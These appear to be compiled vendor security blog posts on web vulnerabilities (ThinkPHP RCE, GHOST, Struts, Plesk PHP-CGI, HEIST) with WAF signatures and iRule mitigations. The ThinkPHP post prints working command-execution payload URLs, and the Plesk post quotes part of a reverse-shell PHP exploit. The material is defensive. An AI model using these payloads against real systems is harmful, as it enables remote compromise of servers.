vulnerability
ThinkPHP 5.x Remote Code Execution Vulnerability
ThinkPHP is an open source PHP framework for agile web application development. The framework is widely adopted worldwide; a quick Shodan search shows more than 40,000 active deployments. Recently, an unauthenticated remote code execution vulnerability was discovered in ThinkPHP and was quickly picked up by a large number of threat actors, who started scanning for vulnerable instances.

The root cause of the vulnerability is the way ThinkPHP parses the requested controller and executes the requested function. The patch committed to the GitHub repository by the maintainers shows that a regular expression validating the supplied controller name was added.

Figure 1: Vulnerability patched by adding a regular expression that validates the supplied controller name

This validation is needed because ThinkPHP receives the requested module, controller and function to execute within a single query parameter and splits it using the '/' character as a delimiter.

Figure 2: ThinkPHP splits the received string in order to get the module and controller names

Once ThinkPHP has parsed the controller name and function, it first creates an instance of the supplied controller by using reflection and then executes the requested function.

Figure 3: ThinkPHP creates an instance of the requested controller and executes the requested function

Both of the publicly disclosed vectors leading to arbitrary command execution attempt to load a valid internal ThinkPHP class. The two payloads are:

http://thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
http://thinkphp/public/index.php?s=/index/\think\request/cache&key=ls%20-l|system

The first attack vector attempts to execute the "invokeFunction" method of the ThinkPHP App class, which allows specifying an arbitrary function to execute and passes the required arguments to that function.

Figure 4: invokeFunction method of ThinkPHP App class

The second attack vector attempts to execute the cache method of the ThinkPHP Request class, which splits its input into a function name and a parameter using the '|' character as a delimiter, and later executes the function with its parameters.

Figure 5: cache method of ThinkPHP Request class

Mitigating the vulnerability with BIG-IP ASM

BIG-IP ASM customers under any supported BIG-IP version are already protected against this vulnerability. The exploitation attempt will be detected by a dedicated attack signature, recently released to mitigate these exploitation attempts, which can be found in signature sets that include the "Server Side Code Injection" attack type or the "PHP" system.

Figure 6: Exploitation attempt blocked by signature id 200004481

Advanced WAF customers with a Threat Intelligence subscription are protected with the following Threat Campaigns:
- ThinkPHP Remote Code Execution - HelloThinkPHP
- ThinkPHP Remote Code Execution - curl zz
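For BIG-IP deployments that do not run ASM or Advanced WAF, a network-side compensating control can also be expressed as an iRule. The following is a minimal, hypothetical sketch (not an official F5 signature) that rejects requests whose decoded query string references the internal \think namespace or the function-invocation primitives used by the public payloads above; the matched strings are assumptions based on those payloads and should be tuned and tested before production use.

    when HTTP_REQUEST {
        # Normalize the query string so URL-encoded payloads (e.g. %5Cthink) are caught as well
        set decoded_query [string tolower [URI::decode [HTTP::query]]]

        # Strings taken from the publicly disclosed ThinkPHP exploitation payloads
        if { ($decoded_query contains "\\think\\") or
             ($decoded_query contains "invokefunction") or
             ($decoded_query contains "call_user_func_array") } {
            log local0. "Possible ThinkPHP RCE attempt from [IP::client_addr]: [HTTP::uri]"
            reject
        }
    }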
Virtual Patching: What is it and why you should be doing it

Yesterday I was privileged to co-host a webinar with WhiteHat Security's Jeremiah Grossman on preventing SQL injection and cross-site scripting using a technique called "virtual patching". While I was familiar with F5's partnership with WhiteHat and our integrated solution, I wasn't familiar with the term.

Virtual patching should put an end to the endless religious warring that goes on between the secure coding and web application firewall camps whenever the topic of web application security is raised. The premise of virtual patching is that a web application firewall is not, I repeat, is not a replacement for secure coding. It is, in fact, an augmentation of existing security systems and practices that enables secure development to occur without being rushed, or outright ignored in favor of rushing a fix out the door.

"The remediation challenges most organizations face are the time consuming process of allocating the proper personnel, prioritizing the tasks, QA / regression testing the fix, and finally scheduling a production release." -- WhiteHat Security, "WhiteHat Website Security Statistic Reports", December 2008

The WhiteHat report goes on to discuss the average number of days it took for organizations to address the top five urgent - not critical, not high, but urgent - severity vulnerabilities discovered. The fewest days to resolve a vulnerability (SQL injection) was 28 in 2008, which is actually an improvement over previous years. 28 days. That's a lifetime on the Internet when your site is vulnerable to exploitation and attackers are massing at the gates faster than ants to a picnic. But you can't rush finding and fixing the vulnerability, and shutting down the web application may not be an option at all, especially if you rely on that application as a revenue stream, as an integration point with partners, or as part of a critical business process with a strict SLA governing its uptime.

So do you leave it vulnerable? According to WhiteHat's data, apparently that's the decision made for many organizations given the limited options. The heads of many security professionals just exploded. My apologies if any of the detritus mussed your screen. If you're one of the ones whose head is still intact, there is a solution. Virtual patching provides the means by which you can prevent the exploitation of the vulnerability while it is addressed through whatever organizational processes are required to resolve it.

Virtual patching is essentially the process of putting a rule in place on a web application firewall to prevent the exploitation of a vulnerability. This process is often a manual one, but in the case of WhiteHat and F5 it has been made as easy as clicking a button. When WhiteHat's Sentinel, which provides vulnerability scanning as a service, uncovers a vulnerability, the operator (that's you) can decide to virtually patch the hole by adding a rule to the appropriate policy on F5's BIG-IP Application Security Manager (ASM) with the click of a button. Once the vulnerability has been addressed, you can remove the rule from the policy or leave it in place, as is your wont. It's up to you.

Virtual patching provides the opportunity to close a vulnerability quickly but doesn't require that you abandon secure coding practices. Virtual patching actually enables and encourages secure coding by giving developers some breathing room in which to implement a thorough, secure solution to the vulnerability.
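To make the concept concrete, here is a minimal, hypothetical sketch of what a hand-written virtual patch can look like as an iRule, assuming a scanner has flagged a SQL injection issue in an "id" parameter of a /account/view.php page. The URL, parameter name and matched patterns are illustrative assumptions only, not part of the WhiteHat-F5 integration.

    when HTTP_REQUEST {
        # Virtual patch: only inspect the specific URL the scanner flagged (hypothetical)
        if { [string tolower [HTTP::path]] equals "/account/view.php" } {
            # Pull the flagged parameter out of the query string and normalize it
            set id_value [string tolower [URI::decode [URI::query [HTTP::uri] "id"]]]

            # Block obvious SQL injection metacharacters and keywords in that parameter
            if { ($id_value contains "'") or
                 ($id_value contains " union ") or
                 ($id_value contains "--") } {
                HTTP::respond 403 content "Request blocked"
                return
            }
        }
    }

In the integrated WhiteHat-F5 workflow, the equivalent rule is generated as an ASM policy entry with a click rather than written by hand, and it can be removed just as easily once the code-level fix ships.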
It isn't an either-or solution, it's both, and it leverages both approaches to provide the most comprehensive security coverage possible. And given statistics regarding the number of sites infected of late, that's something everyone should be able to get behind.

Virtual patching as a technique does not require WhiteHat or F5, but other solutions will require a manual process to put rules in place to address vulnerabilities. The advantage of a WhiteHat-F5 solution is its tight integration via iControl, its ability to immediately close discovered security holes, and of course the lengthy list of security options and features available with ASM to further secure web applications. You can read more about the integration between WhiteHat and F5 here or here, or view a short overview of the way virtual patching works between Sentinel and ASM.

GHOST Vulnerability (CVE-2015-0235)
On 27 January, Qualys published a critical vulnerability dubbed "GHOST", as it can be triggered through the GetHOST functions ( gethostbyname*() ) of the glibc library. Glibc is the main C library on Linux and is present on most Linux distributions. These functions resolve a supplied hostname into a corresponding host structure, performing a DNS lookup when the hostname is a domain name rather than an IP address. The vulnerable functions are obsolete but are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js.

Presently, this vulnerability has been proven remotely exploitable only against the Exim mail service, while arbitrary code execution on any other system using the vulnerable functions is very context-dependent. Qualys listed, on a security mailing list, the applications that were investigated and found not to contain the buffer overflow. Read more on the mailing list archive link below:

http://seclists.org/oss-sec/2015/q1/283

Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to PHP's "gethostbyname()" equivalent.

UPDATE: The WordPress content management system, through its XML-RPC pingback functionality, was found to be vulnerable to GHOST. WordPress automatically notifies popular Update Services that you've updated your blog by sending an XML-RPC ping each time you create or update a post. By sending a specially crafted hostname as a parameter of the XML-RPC pingback method, a vulnerable WordPress instance will return a "500" HTTP response, or no response at all, as a result of the memory corruption. However, exploitability has not yet been proven.

Using ASM to Mitigate the WordPress GHOST exploit

As the crafted hostname needs to be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user-defined attack signature to detect and prevent potential exploitation of this specific vulnerability on WordPress systems.

For versions greater than 11.2.x:

    uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i";

For versions below 11.2.x:

    uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i";

This signature will catch any request to the "xmlrpc.php" URL which contains an IPv4-format hostname greater than 500 characters.

iRule Mitigation for the Exim GHOST exploit

At this time, only Exim mail servers are known to be remotely exploitable, and only if configured to verify hosts after the EHLO/HELO command in an SMTP session. If you run an Exim mail server behind a BIG-IP, the following iRule will detect and mitigate exploitation attempts:

    when CLIENT_ACCEPTED {
        TCP::collect
    }
    when CLIENT_DATA {
        if { ( [string toupper [TCP::payload]] starts_with "HELO " or
               [string toupper [TCP::payload]] starts_with "EHLO " ) and
             ( [TCP::payload length] > 1000 ) } {
            log local0. "Detected GHOST exploitation attempt"
            TCP::close
        }
        TCP::release
        TCP::collect
    }

This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.

90 Seconds of Security: What is CVE and CVSS?
Security researchers at F5 monitor web traffic 24/7 at locations around the world, and the F5 Security Incident Response Team (SIRT) helps customers tackle incident response in real time. When they find a new vulnerability, it'll often get a Common Vulnerabilities and Exposures (CVE) number, like CVE-2019-1105 for the 'Outlook for Android Spoofing Vulnerability'. Created in 1999, CVE provides definitions for all publicly known cybersecurity vulnerabilities and exposures. So, gimme 90 seconds to understand a little bit about Common Vulnerabilities and Exposures.

Now that we've looked at how vulnerabilities become CVEs, let's explain how a CVE gets scored. The Common Vulnerability Scoring System, or CVSS, was introduced in 2005 as an open framework for communicating the characteristics and severity of software vulnerabilities. It consists of three metric groups: Base, Temporal, and Environmental. Once again, let's start the clock to understand a little bit about the Common Vulnerability Scoring System.

Hope that was helpful, and you can catch the entire 90 Seconds series on F5's YouTube Channel. ps

Mitigating The Apache Struts ClassLoader Manipulation Vulnerabilities Using ASM
Background

Recently, the F5 security research team has witnessed a series of CVEs created for the popular Apache Struts platform. From Wikipedia:

Apache Struts was an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture. It was originally created by Craig McClanahan and donated to the Apache Foundation in May, 2000. Formerly located under the Apache Jakarta Project and known as Jakarta Struts, it became a top-level Apache project in 2005.

The initial CVE-2014-0094 disclosed a critical vulnerability that allows an attacker to manipulate the ClassLoader by using the 'class' parameter, which is directly mapped to the getClass() method through the ParametersInterceptor module in the Struts framework. The Apache Struts security bulletin recommended upgrading to Struts 2.3.16.1 to mitigate the vulnerability. Alternatively, users were able to mitigate the vulnerability with a configuration change on their current Struts installations: adding the following regular expression to the list of disallowed parameters in ParametersInterceptor:

    '^class\.*'

After several weeks, this solution was found to be incomplete and sparked four new CVEs: CVE-2014-0112, CVE-2014-0113, CVE-2014-0114 and CVE-2014-0116.

Note: At the time this article was initially released, CVE-2014-0114 and CVE-2014-0116 had not yet been publicly disclosed and were not mentioned here. The article has since been edited to include mitigation for these CVEs as well.

CVE-2014-0112 notes that the ClassLoader vulnerability still exists in parameters, and its security advisory suggests a new regular expression to include in the ParametersInterceptor config: (.*\.
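As a complementary, network-side compensating control (not the regular expression from the Struts advisory, which is not reproduced in full above), a hypothetical iRule along the following lines could reject requests that carry 'class'-prefixed parameter names in the query string before they ever reach a Struts application. The matching is deliberately coarse, covers only the query string (parameters sent in a POST body would need additional handling), and should be validated against legitimate application traffic.

    when HTTP_REQUEST {
        # Normalize the query string so encoded parameter names are inspected too
        set decoded_query [string tolower [URI::decode [HTTP::query]]]

        # Look for parameter names that start with "class." (e.g. class.classLoader.*)
        if { [regexp {(^|&)class\.} $decoded_query] } {
            log local0. "Possible Struts ClassLoader manipulation attempt from [IP::client_addr]"
            HTTP::respond 403 content "Request blocked"
        }
    }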
Plesk Vulnerability

Recently we've witnessed another example of a relatively old and specific vulnerability coming to life through a very common and widespread application. In this case it was CVE-2012-1823, being exploited through the Plesk admin panel. This vulnerability allows remote code execution via a bug in the PHP CGI wrapper, which allows injecting CGI options to the executable as well as piping in other shell commands.

Plesk is a tool that allows automated deployment and centralized management of various system services such as web hosting, DNS and e-mail. It is a widely used application, popular among independent SMBs.

This "out in the wild" code-execution exploit attempts to upload PHP code onto the server using the aforementioned vulnerability in the CGI module. Code injection is possible because query data is passed unescaped directly to the shell. This allows passing options to the CGI binary such as -r (execute code) and -d (define ini). In addition, command-line pipelining is also possible because the entire argument is declared unquoted:

    #!/bin/sh
    exec /dh/cgi-system/php5.cgi $*

Simply reviewing the source code of the exploit reveals no particular sophistication or elaborate attack pattern. It is a straightforward attack vector with PHP code in the body and CGI parameters in the query. This part of the exploit sets the PHP-CGI flags. As we can see, the -d flag is used to declare some config line directives, and the -n flag to bypass the local php.ini. Then the payload is sent, which is a PHP page that sets up a shell with a socket:

    $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip ='$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null;\$error_a = null; \$shell = '/bin/sh -i'; \$daemon = ...

Issuing the exploit against an updated ASM version triggered the following signatures:

- 200004025 - PHP injection attempt ( <? )
- 200004038 - PHP injection attempt ( posix_setsid )
- 200100310 - "/bin" execution attempt (Parameter)
- 200100310 - Shell command (sh/ksh/etc) access (Value)
- 200100330 - PHP-CGI Shell Code Injection (v2)
- 200002437 - SQL-INJ "if(Expression,value,value)" (Parameter)

The PHP and CGI signatures are expected, as are the other command execution ones. As for the SQL-INJ signature, it could be considered a false positive since this attack was not SQL injection. However, since the format of this signature resembles execution code as well as an SQL query, it is understandable why the PHP code in the payload triggered it.
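If patching PHP is not immediately possible, a network-side compensating control can block the argument-injection pattern itself. The following is a minimal, hypothetical iRule sketch based on the exploitation technique described above: CVE-2012-1823 relies on a query string that the CGI wrapper interprets as command-line switches, so a query string that decodes to something beginning with a dash and containing no '=' is a strong indicator of an attack. The exact matching logic is an assumption and should be tested against legitimate application traffic.

    when HTTP_REQUEST {
        # Decode the query string so "%2d"-style encodings of "-" are handled
        set decoded_query [URI::decode [HTTP::query]]

        # PHP-CGI treats a query string with no "=" as argv; a leading "-" means
        # option injection (-s, -d, -n, -r and friends)
        if { ($decoded_query starts_with "-") and !($decoded_query contains "=") } {
            log local0. "Possible PHP-CGI argument injection (CVE-2012-1823) from [IP::client_addr]"
            HTTP::respond 403 content "Request blocked"
        }
    }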
I Can Has UR .htaccess File

Notice that isn't a question, it's a statement of fact.

Twitter is having a bad month. After it was blamed, albeit incorrectly, for a breach leading to the disclosure of both personal and corporate information via Google's GMail and Apps, its apparent willingness to allow anyone and everyone access to a .htaccess file ostensibly protecting search.twitter.com made the rounds via, ironically, Twitter.

This vulnerability at first glance appears fairly innocuous, until you realize just how much information can be placed in a .htaccess file that could have been exposed by this technical configuration faux pas. Included in the .htaccess file are a number of URI rewrites, which give an interesting view of the underlying file system hierarchy Twitter is using, as well as a (rather) lengthy list of IP addresses denied access. All in all, not that exciting, because many of the juicy bits that could be configured via .htaccess for any given website are not done so in this easily accessible .htaccess file. Some things you can do with .htaccess, in case you aren't familiar:

- Create a default error document
- Enable SSI via .htaccess
- Deny users by IP
- Change your default directory page
- Redirects
- Prevent hotlinking of your images
- Prevent directory listing

.htaccess is a very versatile little file, capable of handling all sorts of security and application delivery tasks. Now what's interesting is that the .htaccess file is in the root directory and should not be accessible. Apache configuration files are fairly straightforward, and there are plenty of examples of how to prevent .htaccess - and its wealth of information - from being viewed by clients. Obfuscation, of course, is one possibility, as Apache's httpd.conf allows you to specify the name of the access file with a simple directive:

    AccessFileName .htaccess

It is a simple enough thing to change the name of the file, thus making it more difficult for automated scans to discover vulnerable access files and retrieve them. A little addition to httpd.conf regarding the accessibility of such files will also prevent curious folks from poking at .htaccess and retrieving it with ease. After all, there is no reason for an access file to be viewed by a client; it's a server-side security configuration mechanism, meant only for the web server, and should not be exposed given the potential for leaking a lot of information that could lead to a more serious breach in security.

    <Files ~ "^\.ht">
        Order allow,deny
        Deny from all
        Satisfy All
    </Files>

Another option, if you have an intermediary enabled with network-side scripting, is to prevent access to any .htaccess file across your entire infrastructure. Changes to httpd.conf must be made on every server, so if you have a lot of servers to manage and protect it's quite possible you'd miss one due to the sheer volume of servers to slog through. Using a network-side scripting solution eliminates that possibility because it's one change that can immediately affect all servers. Here's an example using an iRule, but you should also be able to use mod_rewrite to accomplish the same thing if you're using an Apache-based proxy:

    when HTTP_REQUEST {
        # Check the requested URI
        switch -glob [string tolower [HTTP::path]] {
            "/.ht*" { reject }
            default { pool bigwebpool }
        }
    }

However you choose to protect that .htaccess file, just do it.
This isn't rocket science; it's a straight-up simple configuration error that could potentially lead to more serious breaches in security - especially if your .htaccess file contains more sensitive (and informative) information.

Related posts:
- An Unhackable Server is Still Vulnerable
- Twittergate Reveals E-Mail is Bigger Security Risk than Twitter
- Automatically Removing Cookies
- Clickjacking Protection Using X-FRAME-OPTIONS Available for Firefox
- Stop brute force listing of HTTP OPTIONS with network-side scripting
- Jedi Mind Tricks: HTTP Request Smuggling
- I am in your HTTP headers, attacking your application
- Understanding network-side scripting

Lightboard Lessons: OWASP Top 10 - Using Components With Known Vulnerabilities
The OWASP Top 10 is a list of the most common security risks on the Internet today. The #9 risk in the latest edition of the OWASP Top 10 is "Using Components With Known Vulnerabilities". It may seem obvious that you wouldn't want to use components in your web application that have known vulnerabilities, but it's easier said than done. In this video, John discusses this problem and outlines some mitigation steps to make sure your web application stays secure.

Related Resources:
- Securing against the OWASP Top 10: Using Components With Known Vulnerabilities
- Common Vulnerabilities and Exposures (CVE) Database
- National Vulnerability Database (NVD)

HEIST Vulnerability – Overview and BIG-IP Mitigation
An interesting topic was presented at the recent Black Hat conference: a new attack called HEIST (HTTP Encrypted Information can be Stolen through TCP-windows), which demonstrates how to extract sensitive data from any authenticated cross-origin website. What makes this attack unique is that it executes without any traffic eavesdropping or man-in-the-middle scenario. The attack happens in the browser, upon visiting an attacker-controlled website.

Basics of a HEIST

The HEIST attack, as described by Leuven University researchers Mathy Vanhoef and Tom Van Goethem, makes use of a new browser feature called Service Workers, and specifically a new interface called the Fetch API. The Fetch API, much like XMLHttpRequest (XHR), allows arbitrary requests to be sent from the browser. These requests may also include sensitive authorization information such as session cookies. It is obviously not trivial to read the responses to requests sent by the Fetch API or XHR, due to the Same-Origin Policy (SOP) enforced by the browser. However, it may be possible to use side-channel attacks to infer information about the size of the response and, in certain circumstances, even extract personal data.

No Empty Promises

The attack uses the Fetch API and its performance measuring tool. Shortly after an arbitrary request is sent using the Fetch API, the browser creates a Promise object in the DOM. This object is created once the browser starts receiving data from the server. A "responseEnd" attribute is added to the object once the browser has fully received the data. The essence of the attack is determining whether the response consisted of one TCP packet or more, by measuring the time between the Promise object creation and "responseEnd". This allows the attacker to detect the approximate size of any page, as it appears to the victim. For pages that reflect user-input data, the attacker may detect the exact size of the response.

Can I (Ab)Use?

Service Workers are supported in the following browsers. The browser-support table shows that a rather large majority of browsers on the market today already support Service Workers. The trend is expected to grow, as Service Workers are useful for creating dynamic and responsive web applications.

Source: http://caniuse.com/#feat=serviceworkers

Call the Police!

In this section we'll go over possible mitigations, including solutions available for BIG-IP users.

Disable third-party cookies

The researchers list disabling third-party cookies as the only real mitigation for this attack. By disabling this functionality, the browser won't send authorization information in Fetch API and XHR requests made to cross-origin domains.

Pros: Completely disables the attack.
Cons: The setting happens in the browser; web servers cannot enforce this setting upon users. Also, it is unclear what functionality may be hampered by disabling third-party cookies.

Applying data in varying lengths to responses

The researchers also list this action as a possible mitigation. The idea is to add data of random length to every response. This will considerably affect the attacker's ability to determine the actual response length. The original attack requires up to 14 requests to detect the exact response length; by adding random data of varying lengths, the attacker has to work much harder and be more aggressive towards the web server.
The following is an iRule that adds this functionality to BIG-IP virtual servers:

    when HTTP_RESPONSE {
        set sRandomString {}
        set iLength [expr {int(rand() * 1000 + 1)}]
        for {set i 0} {$i < $iLength} {incr i} {
            set iRandomNum [expr {int(rand() * 62)}]
            if {$iRandomNum < 10} {
                incr iRandomNum 48
            } elseif {$iRandomNum < 36} {
                incr iRandomNum 55
            } else {
                incr iRandomNum 61
            }
            append sRandomString [format %c $iRandomNum]
        }
        HTTP::header insert X-HEIST $sRandomString
        log local0. "Added random header X-HEIST: $sRandomString"
    }

This iRule adds a random string as a response header called "X-HEIST". The string length ranges between 1 and 1000 characters.

Pros: Adds significant complexity to the attack, possibly to the point that it is no longer feasible.
Cons: Doesn't completely shut down the vulnerability. In cases where the exact response length isn't interesting to the attacker, this approach alone may be less effective.

Block unknown origins

Fetch API and XHR requests often add a request header that describes from which domain the request originated. For example, an XHR request in a script that runs on "http://attacker.com" will add the following request header:

    Origin: attacker.com

The Origin header is not meant to be used as an access list for security needs. However, it is generally good practice to only allow known domains to send Fetch API or XHR requests. This configuration is available in BIG-IP ASM (version 11.5.0 and up), under Security >> Application Security : URLs : Allowed URLs : Allowed HTTP URLs >> Allowed HTTP URL Properties.

Pros: A request with an unknown Origin will be blocked by ASM, preventing the browser from performing this attack.
Cons: It may be challenging for website admins to create an allowlist of accepted domains. For public APIs it is often desired to allow all origins. In addition, there are some cases where the Origin header isn't added to the request.

Web Scraping protection

Enabling Web Scraping protection in ASM may prevent this attack. Web Scraping protection is configurable under Security >> Application Security : Anomaly Detection : Web Scraping. Combining this protection with the iRule above creates adequate mitigation for this attack. With length randomization in place, the number of requests the attacker must send is significantly increased, which will trigger Web Scraping detection in ASM once it is enabled. Furthermore, during the attack period the browser will fail to answer the JavaScript challenges sent by ASM and therefore will not receive the desired result from the server.

Conclusion

The HEIST attack is a unique and original form of attack. It uses legitimate functionality like cross-origin requests, and is based on known variables such as TCP slow start algorithm defaults. The attack uses a side channel to retrieve data from cross-origin sources, despite the SOP protection found in browsers. As the researchers claim, the only truly effective mitigation for this attack is disabling third-party cookies in the browser. However, using ASM and iRules we've shown that it's possible to effectively mitigate this 0-day vulnerability using the tools and protections already found in BIG-IP.

Managing Your Vulnerabilities
I recently recovered from ACDF surgery, where they remove a herniated or degenerative disc in the neck and fuse the cervical bones above and below the disc. My body had a huge vulnerability where one good shove or fender bender could have ruptured my spinal cord. I had some items removed, added some hardware, and now my risk of injury is greatly reduced.

Breaches are occurring at a record pace, botnets are consuming IoT devices and bandwidth, and the cloud is becoming a de facto standard for many companies. Vulnerabilities are often found at the intersection of all three of these trends, so vulnerability and risk management has never been a greater or more critical challenge for organizations.

Vulnerabilities come in all shapes and sizes, but one thing that stays constant - at least in computer security - is that a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. It is the intersection of a flaw in the system, an attacker's access to that flaw, and the attacker's ability to exploit it. For F5, it means an issue that results in a confidentiality, integrity, or availability impact on an F5 device by an unauthorized source - something that affects critical F5 system functions, like passing traffic.

You may be familiar with CVE, or Common Vulnerabilities and Exposures. This is a dictionary of publicly known information security vulnerabilities and exposures. Each vulnerability or exposure gets a name, or CVE ID, which allows organizations to reference it in a public way. It enables data exchange between security products and provides a baseline index point for evaluating coverage of tools and services. MITRE is the organization that assigns CVEs. There are also CVE Numbering Authorities (CNAs): instead of sending a vulnerability to MITRE for numbering, a CNA gets a block of numbers and can assign IDs as needed. The total number of CVE IDs is around 79,398.

Most organizations are concerned about CVEs and the potential risk if one is present in their environment. This concern is obviously growing with the daily barrage of hacks, breaches and information leaks. Organizations can uncover vulnerabilities from scanner results; from media coverage like Heartbleed, Shellshock, POODLE and others; or from various security-related standards, compliance requirements or internal processes. The key is that scanning results need to be verified for false positives, that hyped vulnerabilities might not be as critical as the headlines claim, and that you understand what the CVE means for your compliance or internal management. At F5, we keep a close eye on any 3rd-party code that might be used in our systems - OpenSSL, BIND and MySQL are examples. For any software, there may be bugs, researcher reports, or even non-CVE vulnerabilities that could compromise the system.

Organizations need to understand the applicability, impact and mitigation available. Simply put: Am I affected? How bad is it? What can I do?

With Applicability, research typically determines whether an organization should care about the vulnerability. Things like: is the affected software version noted, and are you running it? Are you running the vulnerable function within the software? Sometimes older or unsupported versions are vulnerable but you've upgraded to the latest supported code, or you are simply not using the vulnerable function at all. The context is also important. Is it being used in default, standard or recommended mode?
For instance, many people don't change the default password of their Wi-Fi device, and certain functionality is vulnerable. It gets compromised and becomes part of a botnet. But if the password was changed, as recommended, and the device becomes compromised some other way, then that is a different situation to address.

For Impact, there are a couple of ways to decide how bad it is. First, you can look at the severity of the vulnerability - is it low, medium, high or critical? You can also see if there is a Common Vulnerability Scoring System (CVSS) score tied to the vulnerability. The CVSS score gives you a gauge of the overall risk. To go a bit deeper, you can look at the CVSS vector. There are three sections to CVSS: the constant Base metrics, covering the exploitability of the issue, the impact it may have and the scope it is in; the Temporal metrics, which may change over time and give the color commentary of the issue; and the Environmental metrics, which look at the specific, individual environment and how it is impacted. Areas explored here include the attack vector and complexity; whether elevated privileges or any user interaction are required; the scope; and how the issue affects the confidentiality, integrity and availability of the system.

One can use the CVSS calculator to help determine a vector score. With a few selections you can get a base, temporal and environmental score for an overall view of the severity. With this, you can get an understanding of how to handle the vulnerability. Every organization has a different level of risk based on its unique situation. The vulnerability's base score may be listed as critical, yet based on your environmental score the severity and risk may be nil.

Lastly, the Mitigation taken is not an exact science and truly depends on the issue and the organization's situation. Mitigation is not necessarily prevention. For example, compensating controls, such as restricting root-level access, might mean that a vulnerability simply isn't exploitable without a privileged account.

Vulnerability management and information security are about managing risk: risk analysis, risk management, risk mitigation, and what that risk means to the business. Patching a vulnerability can introduce other risks, so the old refrain of "patch your $#!+" is not the panacea we're often led to believe. Risk is not limited to the severity of the vulnerability alone, but also depends on the vector required to exploit that vulnerability where it exists within a specific organization's infrastructure. It's important to understand your risk and focus on the important pieces. ps